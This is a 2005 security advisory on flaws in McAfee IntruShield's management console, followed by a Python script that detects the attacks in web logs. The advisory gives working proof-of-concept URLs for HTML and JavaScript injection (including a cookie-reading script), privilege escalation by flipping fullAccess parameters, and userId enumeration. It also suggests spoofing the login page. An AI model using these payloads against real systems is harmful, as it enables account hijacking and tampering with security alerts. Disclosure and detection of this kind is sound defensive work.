/*
****************************************************************************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
****************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
****************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
****************************************************************************************************

McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm

"The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield
sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and
small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor
appliances. By integrating a comprehensive set of Best-in-Class security management functions, the
IntruShield Security Management System dramatically simplifies and streamlines the complexities associated
with IPS configuration, policy compliance, and threat and response management."

I have found some security vulnerabilities in this product whereby a user can elevate their privileges from
a user that can only view alerts logged by remote sensors to a scenario where the user can acknowledge,
accept and delete alerts and access the Management Console. It is also possible to inject malicious HTML
and JavaScript into the URLs and have this malicious script run on the client's machine, allowing for
account information hijacking.

A new version has been released to address these bugs and can be downloaded from their site.

*/

Issues:
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console

Note: for issues 1 - 4, the attacker needs a valid user account.

1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed
against a valid Manager account.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600></iframe>&severity=critical&count=1

2) It is possible to embed JavaScript into the MISMS and have the embedded script execute in the security
context of the user browsing the Management System.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

3) It is possible to access the restricted "Generate Reports" section of the MISMS, and as such a non-privileged
user can gain important information regarding the configuration and setup of the IP devices being managed by the
Service. This can be achieved by simply changing the fullAccessRight parameter in the URL from false to true.

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true

4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying the URLs
sent to the system, again by simply changing the fullAccess parameter from false to true.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

Each change is emailed out to the administrator; however, the email only says that "someone" made a change.

5) By default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker
to brute-force accounts until a privileged Manager account is found. An example of this would look similar to:

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

This process can be continued until a valid user ID has been found with privileges to access the configure screen.

Since JavaScript can be run in the browsers of clients accessing the device, it would be possible to redraw the page
with IFRAMEs and recreate the user login page to snoop usernames and passwords.
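From the detection side, the following Python script is an added example (not part of the original advisory or of McAfee's product) that flags the three request patterns described above in web-server access logs: HTML or script markup reflected through SystemEvent.jsp parameters (issues 1 and 2), a client-supplied fullAccess or fullAccessRight set to true (issues 3 and 4), and a single client stepping through userId values on disp.jsp (issue 5). The common-log-format lines, the client addresses and the threshold of three distinct userIds are constructed assumptions for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Constructed access-log lines (common log format) modelled on the advisory's URLs;
# 10.0.0.5 is a normal viewer, 10.0.0.9 exercises issues 2, 4 and 5.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2005:10:00:01 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&resourceName=%2FDemo%3A0%2FManager HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:00:02 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&resourceName=%2FDemo%3A0%2FManager HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:00:03 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&resourceName=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:00:04 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:00:05 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2005:10:00:06 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" \d+')
MARKUP_RE = re.compile(r"<\s*/?\s*(script|iframe|img|object|embed)\b", re.I)
PRIV_FLAGS = ("fullAccess", "fullAccessRight")  # access flags the ISM took from the URL
ENUM_THRESHOLD = 3  # distinct userId values from one client before we alert (assumed)


def analyze(log_text):
    """Return a list of (client_ip, finding) pairs for the advisory's three patterns."""
    findings = []
    user_ids = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m["ip"], m["url"]
        path, _, query = url.partition("?")
        params = parse_qs(query, keep_blank_values=True)
        # Issues 1/2: HTML or script markup reflected through any parameter.
        # unquote() also catches payloads that were percent-encoded a second time.
        for name, values in params.items():
            if any(MARKUP_RE.search(unquote(v)) for v in values):
                findings.append((ip, f"markup in {name} on {path}"))
        # Issues 3/4: the client, not the server-side session, asserts full access.
        for flag in PRIV_FLAGS:
            if any(v.lower() == "true" for v in params.get(flag, [])):
                findings.append((ip, f"{flag}=true on {path}"))
        # Issue 5: collect userId values per client to spot sequential probing.
        if path.endswith("/menu/disp.jsp"):
            user_ids[ip].update(int(v) for v in params.get("userId", []) if v.isdigit())
    for ip, ids in user_ids.items():
        if len(ids) >= ENUM_THRESHOLD:
            findings.append((ip, f"userId enumeration: {sorted(ids)}"))
    return findings
```

Running analyze(SAMPLE_LOG) reports the fullAccess=true request, the reflected script in resourceName and the userId walk, all from 10.0.0.9, while the ordinary viewer produces nothing.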